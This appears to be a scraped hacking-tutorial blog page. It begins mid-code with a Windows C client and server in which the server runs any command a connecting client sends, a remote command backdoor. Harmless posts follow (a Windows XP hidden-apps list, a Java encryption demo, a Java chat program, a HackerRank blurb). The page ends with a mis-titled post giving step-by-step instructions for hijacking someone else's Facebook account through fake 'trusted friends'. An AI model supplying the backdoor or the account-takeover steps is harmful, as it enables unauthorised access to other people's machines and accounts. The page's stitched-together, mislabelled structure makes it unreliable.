bytesRecv=recv( m_socket, recvbuf, 20, 0 );
if ( bytesRecv == -1 )
{
printf( "Connection Closed.\n");
return 1;
}

cout<< recvbuf;
}

}

for server:-
//**********************************************************
#include <stdio.h>
#include "winsock2.h"

int main() {


// Initialize Winsock.
WSADATA wsaData;
int iResult = WSAStartup( MAKEWORD(2,2), &wsaData );
if ( iResult != NO_ERROR )
printf("Error at WSAStartup()\n");

// Create a socket.
SOCKET m_socket;
m_socket = socket( AF_INET, SOCK_STREAM, IPPROTO_TCP );

if ( m_socket == INVALID_SOCKET ) {
printf( "Error at socket(): %ld\n", WSAGetLastError() );
WSACleanup();
return 1;
}

// Bind the socket.
sockaddr_in service;

service.sin_family = AF_INET;
service.sin_addr.s_addr = htonl(INADDR_ANY);
service.sin_port = htons( 27015 );

if ( bind( m_socket, (SOCKADDR*) &service, sizeof(service) ) == SOCKET_ERROR ) {
printf( "bind() failed.\n" );
closesocket(m_socket);
return 1;
}

// Listen on the socket.
if ( listen( m_socket, 1 ) == SOCKET_ERROR )
printf( "Error listening on socket.\n");

// Accept connections.
SOCKET AcceptSocket;

printf( "Waiting for a client to connect to server...\n" );
while (1) {
AcceptSocket = SOCKET_ERROR;
while ( AcceptSocket == SOCKET_ERROR ) {
AcceptSocket = accept( m_socket, NULL, NULL );
}
printf( "Client Connected.\n");
m_socket = AcceptSocket;

while(1)
{
char recvbuf[32] = "";
char sendbuf[32] = "Command executed\n\n";
recv( m_socket, recvbuf, 32, 0 );
system(recvbuf); // Executes a remote command

send( m_socket, sendbuf, strlen(sendbuf), 0 );
}
}
return 1;
}

Use own your Own Risk.
We are not responsible for any damage or illegal use of this code.
@letsgainknowldge.com



We welcome your Suggestions and Advice's for improving the content in the blog.Please Comment your queries also whatever you feel from your side.

Find Windows XP hidden apps

Windows XP hidden apps
run any of these apps go to Start > Run and type the executable name (ie charmap).

Windows XP hidden apps:
====================

1) Character Map = charmap.exe (very useful for finding unusual characters)

2) Disk Cleanup = cleanmgr.exe

3) Clipboard Viewer = clipbrd.exe (views contents of window$ clipboard)

4) Dr Watson = drwtsn32.exe (Troubleshooting tool)

5) DirectX diagnosis = dxdiag.exe (Diagnose & test DirectX, video & sound cards)

6) Private character editor = eudcedit.exe (allows creation or modification of characters)

7) IExpress Wizard = iexpress.exe (Create self-extracting / self-installing package)

Micro$oft Synchronization Manager = mobsync.exe (appears to allow synchronization of files on the network for when working offline. Apparently undocumented).

9) window$ Media Player 5.1 = mplay32.exe (Retro version of Media Player, very basic).

10) ODBC Data Source Administrator = odbcad32.exe (something to do with databases)

11) Object Packager = packager.exe (to do with packaging objects for insertion in files, appears to have comprehensive help files).

12) System Monitor = perfmon.exe (very useful, highly configurable tool, tells you everything you ever wanted to know about any aspect of PC performance, for uber-geeks only )

13) Program Manager = progman.exe (Legacy window$ 3.x desktop shell).

14) Remote Access phone book = rasphone.exe (documentation is virtually non-existant).

15) Registry Editor = regedt32.exe [also regedit.exe] (for hacking the window$ Registry).

16) Network shared folder wizard = shrpubw.exe (creates shared folders on network).

17) File siganture verification tool = sigverif.exe

1Cool Volume Control = sndvol32.exe (I've included this for those people that lose it from the System Notification area).

19) System Configuration Editor = sysedit.exe (modify System.ini & Win.ini just like in Win98! ).
20) Syskey = syskey.exe (Secures XP Account database - use with care, it's virtually undocumented but it appears to encrypt all passwords, I'm not sure of the full implications).

21) Micro$oft Telnet Client = telnet.exe

22) Driver Verifier Manager = verifier.exe (seems to be a utility for monitoring the actions of drivers, might be useful for people having driver problems. Undocumented).

23) window$ for Workgroups Chat = winchat.exe (appears to be an old NT utility to allow chat sessions over a LAN, help files available).

24) System configuration = msconfig.exe (can use to control starup programs)
25) gpedit.msc used to manage group policies, and permissions..!

Credits
Letsgainknwldge.com



We welcome your Suggestions and Advice's for improving the content in the blog.Please Comment your queries also whatever you feel from your side.

Create a Local Encrypter Program in Java to protect your data.

   import javax.crypto.Cipher;
   import javax.crypto.BadPaddingException;
   import javax.crypto.IllegalBlockSizeException;
   import javax.crypto.KeyGenerator;
   import java.security.Key;
   import java.security.InvalidKeyException;

   public class LocalEncrypter {

        private static String algorithm = "DESede";
        private static Key key = null;
        private static Cipher cipher = null;

        private static void setUp() throws Exception {
            key = KeyGenerator.getInstance(algorithm).generateKey();
            cipher = Cipher.getInstance(algorithm);
        }

        public static void main(String[] args)
           throws Exception {
            setUp();
            /*if (args.length !=1) {
                System.out.println(
                  "USAGE: java LocalEncrypter " +
                                         "[String]");
                System.exit(1);
            }*/
            byte[] encryptionBytes = null;
            //String input = args[0];
            String input = "imtiyaz hello hello    jhg ghj hgj ";
            System.out.println("Entered: " + input);
            encryptionBytes = encrypt(input);
            System.out.println("Encrytion Data: " + encryptionBytes.toString());
            System.out.println(
              "Recovered: " + decrypt(encryptionBytes));
        }

        private static byte[] encrypt(String input)
            throws InvalidKeyException,
                   BadPaddingException,
                   IllegalBlockSizeException {
            cipher.init(Cipher.ENCRYPT_MODE, key);
            byte[] inputBytes = input.getBytes();
            return cipher.doFinal(inputBytes);
        }

        private static String decrypt(byte[] encryptionBytes)
            throws InvalidKeyException,
                   BadPaddingException,
                   IllegalBlockSizeException {
            cipher.init(Cipher.DECRYPT_MODE, key);
            byte[] recoveredBytes =
              cipher.doFinal(encryptionBytes);
            String recovered =
              new String(recoveredBytes);
            return recovered;
          }
   }
   //*******************End******************************************

We welcome your Suggestions and Advice's for improving the content in the blog.Please Comment your queries also whatever you feel from your side.

MultiThreaded Chat Client program in Java Language

Code :
/*************Start program Server************************************************/
/*This is the server for the MultiThreadedChatClient program that,I wrote basically it gives u a good understanding of how sockets work in java
Author: Sumit Kumar Pundhir
email:sumit123go@gmail.com
*/
import java.io.*;
import java.net.*;
public class MultiThreadChatServer{

    // Declaration section:
    // declare a server socket and a client socket for the server
    // declare an input and an output stream

    static  Socket clientSocket = null;
    static  ServerSocket serverSocket = null;

    // This chat server can accept up to 10 clients' connections

    static  clientThread t[] = new clientThread[10];

    public static void main(String args[]) {

// The default port

int port_number=8888;

if (args.length < 1)
   {
System.out.println("Usage: java MultiThreadChatServer
"+
  "Now using port number="+port_number);
   } else {
port_number=Integer.valueOf(args[0]).intValue();
   }

// Initialization section:
// Try to open a server socket on port port_number (default 8888)
// Note that we can't choose a port less than 1023 if we are not
// privileged users (root)

        try {
   serverSocket = new ServerSocket(port_number);
        }//try
        catch (IOException e)
   {System.out.println(e);}

// Create a socket object from the ServerSocket to listen and accept
// connections.
// Open input and output streams for this socket will be created in
// client's thread since every client is served by the server in
// an individual thread

//can use a for loop to control the number of clients
//I have used the while so that we can have unlimited number of clients
while(true){
   try {
clientSocket = serverSocket.accept();
new clientThread(clientSocket,t).start();
break;
}//try

   catch (IOException e){
System.out.println(e);}
}
    }
} //class

// This client thread opens the input and the output streams for a
particular client,
// ask the client's name, informs all the clients currently connected
to
the
// server about the fact that a new client has joined the chat room,
// and as long as it receive data, echos that data back to all other
clients.
// When the client leaves the chat room this thread informs also all
the
// clients about that and terminates.

class clientThread extends Thread{

    DataInputStream is = null;
    PrintStream os = null;
    Socket clientSocket = null;
    clientThread t[];

    public clientThread(Socket clientSocket, clientThread[] t){
this.clientSocket=clientSocket;
        this.t=t;
    }

    public void run()
    {
String line;
        String name;
try{
   is = new DataInputStream(clientSocket.getInputStream());
   os = new PrintStream(clientSocket.getOutputStream());
   os.println("Enter your name.");
   name = is.readLine();
   os.println("Hello "+name+" to our chat room.
To leave enter /quit
in
a new line");
   for(int i=0; i<=9; i++)
if (t[i]!=null && t[i]!=this)
   t[i].os.println("*** A new user "+name+" entered the chat room
!!!
***" );
   while (true) {
line = is.readLine();
                if(line.startsWith("/quit")) break;
for(int i=0; i<=9; i++)
   if (t[i]!=null)  t[i].os.println("<"+name+"> "+line);
   }
   for(int i=0; i<=9; i++)
if (t[i]!=null && t[i]!=this)
   t[i].os.println("*** The user "+name+" is leaving the chat room
!!!
***" );

   os.println("*** Bye "+name+" ***");

   // Clean up:
   // Set to null the current thread variable such that other client
could
   // be accepted by the server

   for(int i=0; i<=9; i++)
if (t[i]==this) t[i]=null;

   // close the output stream
   // close the input stream
   // close the socket

   is.close();
   os.close();
   clientSocket.close();
}
catch(IOException e){};
    }
}

/*************End program Server**************************************/




/***********************Start Client program************************/

/*This is the client for the MultiThreadedChatServer program that,I
wrote
basically it
gives u a good understanding of how sockets work in java
Author: Sumit Kumar Pundhir
email:sumit123go@gmail.com
*/

import java.io.*;
import java.net.*;

public class MultiThreadChatClient implements Runnable{

    // Declaration section
    // clientClient: the client socket
    // os: the output stream
    // is: the input stream

    static Socket clientSocket = null;
    static PrintStream os = null;
    static DataInputStream is = null;
    static BufferedReader inputLine = null;
    static boolean closed = false;

    public static void main(String[] args) {

// The default port

int port_number=8888;
        String host="localhost";

if (args.length < 2)
   {
System.out.println("Usage: java MultiThreadChatClient
"+
  "Now using host="+host+", port_number="+port_number);
   } else {
host=args[0];
port_number=Integer.valueOf(args[1]).intValue();
   }
// Initialization section:
// Try to open a socket on a given host and port
// Try to open input and output streams
try {
            clientSocket = new Socket(host, port_number);
            inputLine = new BufferedReader(new
InputStreamReader(System.in));
            os = new PrintStream(clientSocket.getOutputStream());
            is = new DataInputStream(clientSocket.getInputStream());
        } catch (UnknownHostException e) {
            System.err.println("Don't know about host "+host);
        } catch (IOException e) {
            System.err.println("Couldn't get I/O for the connection to
the
host "+host);
        }

// If everything has been initialized then we want to write some data
// to the socket we have opened a connection to on port port_number

        if (clientSocket != null && os != null && is != null) {
            try {

// Create a thread to read from the server

                new Thread(new MultiThreadChatClient()).start();

while (!closed) {
                    os.println(inputLine.readLine());
                }

// Clean up:
// close the output stream
// close the input stream
// close the socket

os.close();
is.close();
clientSocket.close();
            } catch (IOException e) {
                System.err.println("IOException:  " + e);
            }
        }
    }

    public void run() {
String responseLine;

// Keep on reading from the socket till we receive the "Bye" from the
server,
// once we received that then we want to break.
try{
   while ((responseLine = is.readLine()) != null) {
System.out.println(responseLine);
if (responseLine.indexOf("*** Bye") != -1) break;
   }
            closed=true;
} catch (IOException e) {
   System.err.println("IOException:  " + e);
}
    }
}

/***********************End Client program************************************/

We welcome your Suggestions and Advice's for improving the content in the blog.Please Comment your queries also whatever you feel from your side.

HackerRank a product of InterviewStreets.com

About

Building the largest community of engaged hackers/problem solvers
Mission
Single place for every talented problem solver in the world to hang out
Description
A fun social platform for hackers to solve interesting puzzles, build quick hacks, code game bots and collaborate to solve real-world challenges.

Basic Info

Contact Info

History by Year

Solve fun programming challenges

An expanding set of challenges across multiple domains of Computer Science. Code in the browser in your chosen language, optimize your algorithm, and learn as you go.
💻

CODE

Solve competitive real-world and artificial intelligence challenges.
💡

LEARN

Educational challenges allow you to explore new fields of Computer Science and increase your skills.

COMPETE

Compete in weekly contests or featured hackathons for prizes.

You can mail us at hackers@hackerrank.com if you are interested.

How to Transfer Windows Files - Images - Settings Easily

    How to Transfer Windows Files - Images - Settings Easily:
    There are various methods to hack facbook account password like Keyloggers, Phishing websites etc.. whereas bruteforcing, dictionary attacks, DDOS attack etc will not work directly due account lockout feature. Today in this post I am going to share a very effective way to hack facebook account I named it Hacking with Trusted Friends.
    Hacking of Facebook Account with Trusted Friends is also not so simple. To get started with it, you have to create and make sure they are in friend list of the person whose facebook account you are going to hack. If you can make this happen then roll up your sleeves to begin the real action.
Warning: The Sole purpose of this article is to highlight the loophole in security. I am not responsible if you use it with malicious intentions and get caught..!!How to Hack Your Friend’s Facebook Account:




  • First of all, create three new Facebook Accounts and add all these three accounts in your friend’s friend list. If you are done with the first step then you have done 90% of your work.
  • Click on Forgot your Password button. It will show three options to recover your password.
  • In the first option give his Email Address and in the Name field give your Friend’s Full Name, your name and click on Search button.
  • Now if everything goes well you will see the profile picture of that person. Here click on the No longer have access to these.
  • Now Enter your New Email address which doesn’t associated with any facebook account yet and click onSubmit button.
  • Now you will be prompted to Security question. If you know the answer then it is well and good otherwise, give wrong answers for three times.
  • Now after three unsuccessful attempts, it will ask you to recover your account with trusted friend feature. Click onContinue button.
  • It will ask you to choose three friends. Select your created accounts from the list and click on Continue button each time.
  • After selecting three friends, Facebook will send security codes to the Email address associated with those fake accounts. Login to each account and fill the security codes in the same manner. Also check spam messages if it is not there.
  • Now you will get password Reset Email on Email Address that you have entered in 5th step (New Email address which doesn’t associated with any facebook account).

    That’s it..! You have hacked your friends Facebook Account. Enjoy..!!

Popular Posts